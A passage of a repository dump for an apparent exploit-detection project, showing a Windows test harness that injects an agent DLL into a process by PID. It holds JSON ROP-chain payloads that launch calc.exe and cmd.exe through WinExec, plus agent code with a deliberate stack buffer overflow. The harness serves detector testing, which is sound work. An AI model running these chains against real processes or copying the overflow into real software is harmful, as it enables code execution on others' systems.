= std::tstring(), int timeout = 1000); 48 | ~server(); 49 | void run(); 50 | void stop(); 51 | void route(int cmd, pf_handler handler); 52 | 53 | private: 54 | bool stop_; 55 | mutex mr_; 56 | std::vector routers_; 57 | struct server_data* data_; 58 | }; 59 | 60 | typedef std::vector byte_array; 61 | 62 | class client { 63 | public: 64 | client(const std::tstring& server_name = std::tstring(), int timeout = 1000); 65 | ~client(); 66 | 67 | byte_array request(int cmd, unsigned char* data = NULL, int data_size = 0); 68 | private: 69 | std::tstring server_name; 70 | int timeout; 71 | }; 72 | } 73 | 74 | #endif -------------------------------------------------------------------------------- /Resources/TestTool/payloads/payload_calc.json: -------------------------------------------------------------------------------- 1 | { 2 | "payload": [ 3 | {"G": "MOV ECX, ESP ; RET"}, 4 | {"G": "SUB ECX, 32 ; RET"}, 5 | {"G": "POP EDX ; POP EAX ; RET"}, 6 | {"D": "0x575c3a43"}, 7 | {"D": "0x4f444e49"}, 8 | {"G": "MOV DWORD PTR DS:[ECX], EDX ; MOV DWORD PTR DS:[ECX+4], EAX ; RET"}, 9 | {"G": "POP EDX ; POP EAX ; RET"}, 10 | {"D": "0x735c5357"}, 11 | {"D": "0x65747379"}, 12 | {"G": "MOV DWORD PTR DS:[ECX+8], EDX ; MOV DWORD PTR DS:[ECX+12], EAX ; RET"}, 13 | {"G": "POP EDX ; POP EAX ; RET"}, 14 | {"D": "0x5c32336d"}, 15 | {"D": "0x636c6163"}, 16 | {"G": "MOV DWORD PTR DS:[ECX+16], EDX ; MOV DWORD PTR DS:[ECX+20], EAX ; RET"}, 17 | {"G": "POP EAX ; RET"}, 18 | {"D": "0x6578652e"}, 19 | {"G": "MOV DWORD PTR DS:[ECX+24], EAX ; RET"}, 20 | {"G": "XOR EAX, EAX ; RET"}, 21 | {"G": "ADD EAX, 1 ; RET"}, 22 | {"G": "MOV DWORD PTR DS:[ECX-4], EAX ; MOV DWORD PTR DS:[ECX-8], ECX ; RET"}, 23 | {"G": "POP ESI ; RET"}, 24 | {"F": "WinExec"}, 25 | {"G": "MOV ESP, ECX ; SUB ESP, 8 ; CALL ESI ; RET"}, 26 | {"G": "NOP ; NOP ; NOP ; RET"} 27 | ] 28 | } -------------------------------------------------------------------------------- /Resources/TestTool/payloads/payload_cmd.json: -------------------------------------------------------------------------------- 1 | { 2 | "payload": [ 3 | {"G": "MOV ECX, ESP ; RET"}, 4 | {"G": "SUB ECX, 32 ; RET"}, 5 | {"G": "POP EDX ; POP EAX ; RET"}, 6 | {"D": "0x575c3a43"}, 7 | {"D": "0x4f444e49"}, 8 | {"G": "MOV DWORD PTR DS:[ECX], EDX ; MOV DWORD PTR DS:[ECX+4], EAX ; RET"}, 9 | {"G": "POP EDX ; POP EAX ; RET"}, 10 | {"D": "0x735c5357"}, 11 | {"D": "0x65747379"}, 12 | {"G": "MOV DWORD PTR DS:[ECX+8], EDX ; MOV DWORD PTR DS:[ECX+12], EAX ; RET"}, 13 | {"G": "POP EDX ; POP EAX ; RET"}, 14 | {"D": "0x5c32336d"}, 15 | {"D": "0x2e646d63"}, 16 | {"G": "MOV DWORD PTR DS:[ECX+16], EDX ; MOV DWORD PTR DS:[ECX+20], EAX ; RET"}, 17 | {"G": "POP EAX ; RET"}, 18 | {"D": "0x00657865"}, 19 | {"G": "MOV DWORD PTR DS:[ECX+24], EAX ; RET"}, 20 | {"G": "XOR EAX, EAX ; RET"}, 21 | {"G": "ADD EAX, 1 ; RET"}, 22 | {"G": "MOV DWORD PTR DS:[ECX-4], EAX ; MOV DWORD PTR DS:[ECX-8], ECX ; RET"}, 23 | {"G": "POP ESI ; RET"}, 24 | {"F": "WinExec"}, 25 | {"G": "MOV ESP, ECX ; SUB ESP, 8 ; CALL ESI ; RET"}, 26 | {"G": "NOP ; NOP ; NOP ; RET"} 27 | ] 28 | } -------------------------------------------------------------------------------- /Resources/TestTool/testtool/Executors/exec_ropchain.h: -------------------------------------------------------------------------------- 1 | #ifndef _EXECUTOR_ROP_CHAIN_H_ 2 | #define _EXECUTOR_ROP_CHAIN_H_ 3 | 4 | #include "../helpers.h" 5 | 6 | #define MAX_PAYLOAD_SIZE 20000 7 | 8 | class ExecutorROPChain : public Executor 9 | { 10 | public: 11 | bool Execute(TestCommon::TestData &data); 12 | 13 | ExecutorROPChain() : Executor(TestCommon::ExecutorModeToString(TestCommon::ExecutorsMode::TEST_ROP_CHAIN), 14 | TestCommon::ExecutorsMode::TEST_ROP_CHAIN) 15 | { } 16 | 17 | private: 18 | 19 | }; 20 | 21 | #endif -------------------------------------------------------------------------------- /Resources/TestTool/testtool/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : testtool Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this testtool application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your testtool application. 9 | 10 | 11 | testtool.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | testtool.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | testtool.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named testtool.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /Resources/TestTool/testtool/cmdparser.h: -------------------------------------------------------------------------------- 1 | #ifndef _CMD_PARSER_H_ 2 | #define _CMD_PARSER_H_ 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | class CmdArgsParser 9 | { 10 | public: 11 | CmdArgsParser(int argc, wchar_t *argv[]) 12 | { 13 | for (int i = 1; i < argc; ++i) 14 | { 15 | this->cmdTokens.push_back(std::wstring(argv[i])); 16 | } 17 | 18 | } 19 | 20 | const std::wstring& GetOptionValue(const std::wstring &cmdOption) const 21 | { 22 | std::vector::const_iterator cmdIt; 23 | cmdIt = std::find(this->cmdTokens.begin(), this->cmdTokens.end(), cmdOption); 24 | if (cmdIt != this->cmdTokens.end() && ++cmdIt != this->cmdTokens.end()) 25 | { 26 | return *cmdIt; 27 | } 28 | static const std::wstring empty(L""); 29 | return empty; 30 | } 31 | 32 | bool WasOptionRequested(const std::wstring &cmdOption) const 33 | { 34 | return 35 | std::find(this->cmdTokens.begin(), this->cmdTokens.end(), cmdOption) != this->cmdTokens.end(); 36 | } 37 | 38 | private: 39 | std::vector cmdTokens; 40 | }; 41 | 42 | #endif 43 | -------------------------------------------------------------------------------- /Resources/TestTool/testtool/executor.h: -------------------------------------------------------------------------------- 1 | #ifndef _EXECUTOR_H_ 2 | #define _EXECUTOR_H_ 3 | 4 | #include "helpers.h" 5 | 6 | class Executor 7 | { 8 | 9 | public: 10 | virtual bool Execute(TestCommon::TestData &data) = 0; 11 | 12 | const std::wstring GetDescription() 13 | { 14 | return m_description; 15 | } 16 | 17 | const TestCommon::ExecutorsMode GetMode() 18 | { 19 | return m_testExecutorMode; 20 | } 21 | 22 | Executor(std::wstring description, TestCommon::ExecutorsMode mode) : 23 | m_description(description), m_testExecutorMode(mode) {} 24 | 25 | Executor() : 26 | m_description(L""), m_testExecutorMode(TestCommon::ExecutorsMode::NA) {} 27 | 28 | private: 29 | std::wstring m_description; 30 | TestCommon::ExecutorsMode m_testExecutorMode; 31 | }; 32 | 33 | #endif 34 | 35 | -------------------------------------------------------------------------------- /Resources/TestTool/testtool/executorManager.cpp: -------------------------------------------------------------------------------- 1 | #include "executorManager.h" 2 | 3 | bool ExecutorManager::RunExecutor(const TestCommon::ExecutorsMode mode, 4 | TestCommon::TestData &data) 5 | { 6 | bool ret = false; 7 | 8 | for (std::vector>::const_iterator executorIt = m_executors.begin(); 9 | executorIt != m_executors.end(); 10 | ++executorIt) 11 | { 12 | if (*executorIt != nullptr) 13 | { 14 | std::shared_ptr executor = *executorIt; 15 | if (executor->GetMode() == mode) 16 | { 17 | ret = executor->Execute(data); 18 | break; 19 | } 20 | } 21 | } 22 | 23 | return ret; 24 | } -------------------------------------------------------------------------------- /Resources/TestTool/testtool/executorManager.h: -------------------------------------------------------------------------------- 1 | #ifndef _REMEDIATOR_MANAGER_H_ 2 | #define _REMEDIATOR_MANAGER_H_ 3 | 4 | #include "helpers.h" 5 | #include "executor.h" 6 | 7 | class ExecutorManager 8 | { 9 | public: 10 | template 11 | void AddExecutor(std::shared_ptr& executor) 12 | { 13 | m_executors.push_back(executor); 14 | } 15 | 16 | bool RunExecutor(const TestCommon::ExecutorsMode mode, 17 | TestCommon::TestData &data); 18 | 19 | ExecutorManager::ExecutorManager() {} 20 | 21 | private: 22 | std::vector> m_executors; 23 | }; 24 | 25 | #endif -------------------------------------------------------------------------------- /Resources/TestTool/testtool/helpers.h: -------------------------------------------------------------------------------- 1 | #ifndef _HELPERS_H_ 2 | #define _HELPERS_H_ 3 | 4 | #include "../common/common.h" 5 | #include "../common/ipcpp.h" 6 | #include "cmdparser.h" 7 | #include "executor.h" 8 | #include "executorManager.h" 9 | #include "Executors/exec_ropchain.h" 10 | 11 | namespace TestToolHelpers 12 | { 13 | int ToInteger(const std::wstring &st); 14 | bool IsValidFile(const std::wstring &fileName); 15 | bool GetFullPathToFile(const std::wstring &fileName, std::wstring &fullPathFile); 16 | bool IsNumber(const std::wstring& str); 17 | bool GetFileToInjectSize(const std::wstring& file, DWORD &size); 18 | bool ReadFileToInjectInBuffer(const std::wstring& file, const DWORD &fileSize, LPVOID lpBuffer, DWORD &bytesRead); 19 | bool IsTestDataValid(TestCommon::TestData &data); 20 | bool InjectIntoRemoteProcess(const std::wstring &dllToInject, const std::wstring &targetPIDToInject, HANDLE& hProcess); 21 | bool WriteRemoteProcessMemory(const HANDLE hProcess, const LPVOID &buffer, const DWORD &bufferSize, LPVOID &remoteBufferAddr); 22 | 23 | class IPCClient 24 | { 25 | public: 26 | TestCommon::ARRAYBYTE SendRequest(TestCommon::ExecutorsMode executorID, unsigned char *dataPayload, int dataSize); 27 | 28 | IPCClient() 29 | { 30 | m_client = new dipc::client(); 31 | } 32 | 33 | IPCClient(const std::wstring &channelID) : m_currentChannelID(channelID) 34 | { 35 | m_client = new dipc::client(channelID); 36 | } 37 | 38 | private: 39 | std::wstring m_currentChannelID; 40 | dipc::client* m_client; 41 | }; 42 | } 43 | 44 | #endif -------------------------------------------------------------------------------- /Resources/TestTool/testtool/payload_schema.json: -------------------------------------------------------------------------------- 1 | { 2 | "type": "object", 3 | "properties": { 4 | "payload": { 5 | "type": "array", 6 | "items": { 7 | "type": "object", 8 | "patternProperties": { 9 | "^[G|F|D]$": { "type": "string" } 10 | } 11 | } 12 | } 13 | }, 14 | "required": ["payload"] 15 | } -------------------------------------------------------------------------------- /Resources/TestTool/testtool/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by testtool.rc 4 | 5 | // Next default values for new objects 6 | // 7 | #ifdef APSTUDIO_INVOKED 8 | #ifndef APSTUDIO_READONLY_SYMBOLS 9 | #define _APS_NEXT_RESOURCE_VALUE 101 10 | #define _APS_NEXT_COMMAND_VALUE 40001 11 | #define _APS_NEXT_CONTROL_VALUE 1001 12 | #define _APS_NEXT_SYMED_VALUE 101 13 | #endif 14 | #endif 15 | -------------------------------------------------------------------------------- /Resources/TestTool/testtool/testtool.cpp: -------------------------------------------------------------------------------- 1 | // testtool.cpp : Defines the entry point for the console application. 2 | // 3 | 4 | #include "helpers.h" 5 | 6 | 7 | void ShowHelp() 8 | { 9 | std::wcerr << L"testtool usage:" << std::endl; 10 | std::wcerr << L"testtool.exe -h for help" << std::endl; 11 | std::wcerr << L"testtool.exe -f -t " << std::endl; 12 | } 13 | 14 | 15 | 16 | int wmain(int argc, wchar_t *argv[]) 17 | { 18 | int ret = 0; 19 | UINT32 executorMode = TestCommon::DEFAULT_EXECUTOR_MODE; 20 | std::wstring defaultFileToInject(TestCommon::DEFAULT_DLL_TO_INJECT); 21 | CmdArgsParser inputCmds(argc, argv); 22 | TestCommon::TestData testData; 23 | 24 | if (inputCmds.WasOptionRequested(L"-h") || 25 | !inputCmds.WasOptionRequested(L"-f") || 26 | !inputCmds.WasOptionRequested(L"-t")) 27 | { 28 | std::wcerr << L"[-] Make sure to provide all the required arguments" << std::endl; 29 | ShowHelp(); 30 | return 1; 31 | } 32 | 33 | const std::wstring &pidToInject = inputCmds.GetOptionValue(L"-t"); 34 | if (pidToInject.empty() || 35 | !TestToolHelpers::IsNumber(pidToInject)) 36 | { 37 | std::wcerr << L"[-] Provided PID is not valid" << std::endl; 38 | ShowHelp(); 39 | return 1; 40 | } 41 | 42 | const std::wstring &testcaseFile = inputCmds.GetOptionValue(L"-f"); 43 | std::wstring fullPathTestcaseFile; 44 | if (TestToolHelpers::IsValidFile(testcaseFile) && 45 | TestToolHelpers::GetFullPathToFile(testcaseFile, fullPathTestcaseFile) && 46 | !fullPathTestcaseFile.empty()) 47 | { 48 | std::wcout << "[+] Testcase file is going to be used: " << fullPathTestcaseFile << std::endl; 49 | } 50 | else 51 | { 52 | 53 | std::wcerr << L"[-] Given testcase file cannot be found" << std::endl; 54 | ShowHelp(); 55 | return 1; 56 | } 57 | 58 | std::wstring fullPathToFileToInject; 59 | if (TestToolHelpers::IsValidFile(defaultFileToInject) && 60 | TestToolHelpers::GetFullPathToFile(defaultFileToInject, fullPathToFileToInject)) 61 | { 62 | std::wcout << "[+] Agent DLL to be injected: " << defaultFileToInject << std::endl; 63 | } 64 | else 65 | { 66 | std::wcerr << L"[-] TestToolAgent DLL file to inject cannot be found" << std::endl; 67 | ShowHelp(); 68 | return 1; 69 | } 70 | 71 | //Real work starts here 72 | ExecutorManager manager; 73 | auto execROPChain = std::make_shared(); 74 | 75 | manager.AddExecutor(execROPChain); 76 | 77 | testData.channelID.assign(TestCommon::PRE_CHANNEL_TOKEN + pidToInject); 78 | testData.fileToInject.assign(fullPathToFileToInject); 79 | testData.testcaseFile.assign(fullPathTestcaseFile); 80 | testData.pidToInject.assign(pidToInject); 81 | 82 | std::wcout << "[+] About to Execute ROP Chain against PID: " << pidToInject << std::endl; 83 | std::wcout << "[+] Using the following file as a payload: " << testcaseFile << std::endl; 84 | 85 | if (manager.RunExecutor(TestCommon::ExecutorsMode::TEST_ROP_CHAIN, testData)) 86 | { 87 | std::wcout << "[+] Testcase was succesfully executed!" << std::endl; 88 | } 89 | else 90 | { 91 | std::wcout << "[-] There was a problem executing the requested testcase: " << 92 | TestCommon::ExecutorModeToString(TestCommon::ExecutorsMode::TEST_ROP_CHAIN) << 93 | std::endl; 94 | } 95 | 96 | return 0; 97 | } 98 | 99 | -------------------------------------------------------------------------------- /Resources/TestTool/testtool/testtool.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Resources/TestTool/testtool/testtool.rc -------------------------------------------------------------------------------- /Resources/TestTool/testtoolagent/Executors/exec_rop_chain.cpp: -------------------------------------------------------------------------------- 1 | #include "executors.h" 2 | 3 | #define CHAIN_BUFFER_SIZE 128 4 | 5 | #pragma warning(disable : 4996) 6 | #pragma runtime_checks( "", off ) 7 | 8 | int TestToolAgentExecutors::ExecROPChain(unsigned char* ropChain) 9 | { 10 | int ret = 0; 11 | 12 | TestCommon::Xtrace(L"[TestToolAgent] Entering to ExecROPChain!"); 13 | 14 | char ropChainOnStack[CHAIN_BUFFER_SIZE] = { 0 }; 15 | 16 | FILE *ropChainFile; 17 | int filesize; 18 | 19 | ropChainFile = fopen("c:\\rop_chain.txt", "rb"); 20 | if (!ropChainFile) { 21 | printf("Error opening %s\n", "c:\\rop_chain.txt"); 22 | return ret; 23 | } 24 | 25 | fseek(ropChainFile, 0, SEEK_END); 26 | filesize = ftell(ropChainFile); 27 | fseek(ropChainFile, 0, SEEK_SET); 28 | 29 | // Copying the rop chain into the stack, so buffer overflow happens here 30 | fread(ropChainOnStack, 1, filesize, ropChainFile); 31 | 32 | fclose(ropChainFile); 33 | 34 | if (ropChainOnStack[0]) { //use local variables so compiler won't remove them 35 | DeleteFile(L"c:\\rop_chain.txt"); 36 | TestCommon::Xtrace(L"[TestToolAgent] Leaving ExecROPChain!"); 37 | } 38 | 39 | return ret; 40 | } 41 | -------------------------------------------------------------------------------- /Resources/TestTool/testtoolagent/Executors/executors.h: -------------------------------------------------------------------------------- 1 | #ifndef _TEST_FRAMEWORK_EXECUTORS_H_ 2 | #define _TEST_FRAMEWORK_EXECUTORS_H_ 3 | 4 | #include "../../common/common.h" 5 | 6 | namespace TestToolAgentExecutors 7 | { 8 | int ExecROPChain(unsigned char* data); 9 | int GetRemoteFunctionAddress(unsigned char* data); 10 | } 11 | 12 | #endif -------------------------------------------------------------------------------- /Resources/TestTool/testtoolagent/Executors/get_remote_function_address.cpp: -------------------------------------------------------------------------------- 1 | #include "executors.h" 2 | 3 | #pragma warning(disable : 4996) 4 | #pragma runtime_checks( "", off ) 5 | 6 | int TestToolAgentExecutors::GetRemoteFunctionAddress(unsigned char* ropChain) 7 | { 8 | TestCommon::Xtrace(L"[TestToolAgent] Entering to GetRemoteFunctionAddress!"); 9 | 10 | if (ropChain == nullptr) 11 | return 0; 12 | 13 | int ret = 0; 14 | DWORD* functionAddress = nullptr; 15 | 16 | std::string functionName((char*)ropChain); 17 | 18 | if (functionName == "WinExec") { 19 | functionAddress = (DWORD*)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), functionName.c_str()); 20 | } 21 | 22 | if (functionAddress != NULL) 23 | memcpy(ropChain, &functionAddress, 4); 24 | else 25 | TestCommon::Xtrace(L"[TestToolAgent] Error getting function address"); 26 | 27 | TestCommon::Xtrace(L"[TestToolAgent] Leaving GetRemoteFunctionAddress!"); 28 | 29 | return sizeof(DWORD); 30 | } 31 | -------------------------------------------------------------------------------- /Resources/TestTool/testtoolagent/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | DYNAMIC LINK LIBRARY : testtoolagent Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this testtoolagent DLL for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your testtoolagent application. 9 | 10 | 11 | testtoolagent.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | testtoolagent.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | testtoolagent.cpp 25 | This is the main DLL source file. 26 | 27 | When created, this DLL does not export any symbols. As a result, it 28 | will not produce a .lib file when it is built. If you wish this project 29 | to be a project dependency of some other project, you will either need to 30 | add code to export some symbols from the DLL so that an export library 31 | will be produced, or you can set the Ignore Input Library property to Yes 32 | on the General propert page of the Linker folder in the project's Property 33 | Pages dialog box. 34 | 35 | ///////////////////////////////////////////////////////////////////////////// 36 | Other standard files: 37 | 38 | StdAfx.h, StdAfx.cpp 39 | These files are used to build a precompiled header (PCH) file 40 | named testtoolagent.pch and a precompiled types file named StdAfx.obj. 41 | 42 | ///////////////////////////////////////////////////////////////////////////// 43 | Other notes: 44 | 45 | AppWizard uses "TODO:" comments to indicate parts of the source code you 46 | should add to or customize. 47 | 48 | ///////////////////////////////////////////////////////////////////////////// 49 | -------------------------------------------------------------------------------- /Resources/TestTool/testtoolagent/dispatcher.cpp: -------------------------------------------------------------------------------- 1 | #include "helpers.h" 2 | #include "dispatcher.h" 3 | 4 | #pragma comment(lib, "Ws2_32.lib") 5 | 6 | DWORD WINAPI TestToolAgentCore::RunTestToolAgent(LPVOID lpParameter) 7 | { 8 | bool ret = false; 9 | HANDLE coreThread = INVALID_HANDLE_VALUE; 10 | WORD wVersionRequested = MAKEWORD(1, 0); 11 | WSADATA wsaData; 12 | WSAStartup(wVersionRequested, &wsaData); 13 | srand(GetTickCount()); 14 | 15 | DWORD currentPID = GetCurrentProcessId(); 16 | std::wstring serverName(TestCommon::PRE_CHANNEL_TOKEN + std::to_wstring(currentPID)); 17 | 18 | dipc::server testToolAgentServer(serverName); 19 | testToolAgentServer.route(TestCommon::ExecutorsMode::TEST_ROP_CHAIN, TestToolAgentExecutors::ExecROPChain); 20 | testToolAgentServer.route(TestCommon::ExecutorsMode::GET_REMOTE_FUNCTION_ADDRESS, TestToolAgentExecutors::GetRemoteFunctionAddress); 21 | 22 | testToolAgentServer.run(); 23 | 24 | return ret; 25 | } -------------------------------------------------------------------------------- /Resources/TestTool/testtoolagent/dispatcher.h: -------------------------------------------------------------------------------- 1 | #ifndef _TEST_FRAMEWORK_DISPATCHER_H_ 2 | #define _TEST_FRAMEWORK_DISPATCHER_H_ 3 | 4 | #include "helpers.h" 5 | 6 | namespace TestToolAgentCore 7 | { 8 | DWORD WINAPI ServerThread(LPVOID lp); 9 | DWORD WINAPI RunTestToolAgent(LPVOID lpParameter); 10 | } 11 | 12 | #endif -------------------------------------------------------------------------------- /Resources/TestTool/testtoolagent/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Defines the entry point for the DLL application. 2 | #include "helpers.h" 3 | 4 | BOOL APIENTRY DllMain( HMODULE hModule, 5 | DWORD ul_reason_for_call, 6 | LPVOID lpReserved 7 | ) 8 | { 9 | HANDLE threadHandle = INVALID_HANDLE_VALUE; 10 | DWORD currentPID = GetCurrentProcessId(); 11 | BOOL ret = true; 12 | switch (ul_reason_for_call) 13 | { 14 | case DLL_PROCESS_ATTACH: 15 | threadHandle = CreateThread(NULL, 0, TestToolAgentCore::RunTestToolAgent, NULL, 0, NULL); 16 | if (threadHandle != INVALID_HANDLE_VALUE) 17 | { 18 | TestCommon::Xtrace(L"[TestToolAgent] Agent was launched at PID: %d", currentPID); 19 | ret = true; 20 | } 21 | else 22 | { 23 | TestCommon::Xtrace(L"[TestToolAgent] There was a problem launching Agent at PID: %d", currentPID); 24 | } 25 | CloseHandle(threadHandle); 26 | break; 27 | case DLL_THREAD_ATTACH: 28 | break; 29 | case DLL_THREAD_DETACH: 30 | case DLL_PROCESS_DETACH: 31 | break; 32 | } 33 | return ret; 34 | } 35 | 36 | -------------------------------------------------------------------------------- /Resources/TestTool/testtoolagent/helpers.cpp: -------------------------------------------------------------------------------- 1 | #include "helpers.h" 2 | -------------------------------------------------------------------------------- /Resources/TestTool/testtoolagent/helpers.h: -------------------------------------------------------------------------------- 1 | #ifndef _TEST_FRAMEWORK_HELPERS_H_ 2 | #define _TEST_FRAMEWORK_HELPERS_H_ 3 | 4 | #include "../common/common.h" 5 | #include "../common/ipcpp.h" 6 | #include "Executors/executors.h" 7 | #include "dispatcher.h" 8 | 9 | #endif -------------------------------------------------------------------------------- /Resources/TestTool/testtoolagent/testtoolagent.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {e0906f37-29ec-4300-b021-a4b99c23d6b6} 18 | 19 | 20 | {58250856-0601-4e7a-ac20-3284474b9c88} 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | Source Files 29 | 30 | 31 | Source Files 32 | 33 | 34 | Source Files 35 | 36 | 37 | Common 38 | 39 | 40 | Executors 41 | 42 | 43 | Executors 44 | 45 | 46 | 47 | 48 | Header Files 49 | 50 | 51 | Header Files 52 | 53 | 54 | Common 55 | 56 | 57 | Common 58 | 59 | 60 | Executors 61 | 62 | 63 | -------------------------------------------------------------------------------- /Resources/loadLibrary_x86_address/loadLibrary_x86_address.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.25420.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "loadLibrary_x86_address", "loadLibrary_x86_address\loadLibrary_x86_address.vcxproj", "{DB6D61A1-C56F-4652-8B10-5696E2FCED6D}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {DB6D61A1-C56F-4652-8B10-5696E2FCED6D}.Debug|x64.ActiveCfg = Debug|Win32 17 | {DB6D61A1-C56F-4652-8B10-5696E2FCED6D}.Debug|x64.Build.0 = Debug|Win32 18 | {DB6D61A1-C56F-4652-8B10-5696E2FCED6D}.Debug|x86.ActiveCfg = Debug|Win32 19 | {DB6D61A1-C56F-4652-8B10-5696E2FCED6D}.Debug|x86.Build.0 = Debug|Win32 20 | {DB6D61A1-C56F-4652-8B10-5696E2FCED6D}.Release|x64.ActiveCfg = Release|Win32 21 | {DB6D61A1-C56F-4652-8B10-5696E2FCED6D}.Release|x64.Build.0 = Release|Win32 22 | {DB6D61A1-C56F-4652-8B10-5696E2FCED6D}.Release|x86.ActiveCfg = Release|Win32 23 | {DB6D61A1-C56F-4652-8B10-5696E2FCED6D}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /Resources/loadLibrary_x86_address/loadLibrary_x86_address/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : loadLibrary_x86_address Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this loadLibrary_x86_address application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your loadLibrary_x86_address application. 9 | 10 | 11 | loadLibrary_x86_address.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | loadLibrary_x86_address.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | loadLibrary_x86_address.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named loadLibrary_x86_address.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /Resources/loadLibrary_x86_address/loadLibrary_x86_address/loadLibrary_x86_address.cpp: -------------------------------------------------------------------------------- 1 | // loadLibrary_x86_address.cpp : Defines the entry point for the console application. 2 | // 3 | 4 | #include "stdafx.h" 5 | #include 6 | 7 | UINT32 main() 8 | { 9 | return (UINT32)LoadLibraryW; 10 | } 11 | 12 | -------------------------------------------------------------------------------- /Resources/loadLibrary_x86_address/loadLibrary_x86_address/loadLibrary_x86_address.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /Resources/loadLibrary_x86_address/loadLibrary_x86_address/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // loadLibrary_x86_address.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- 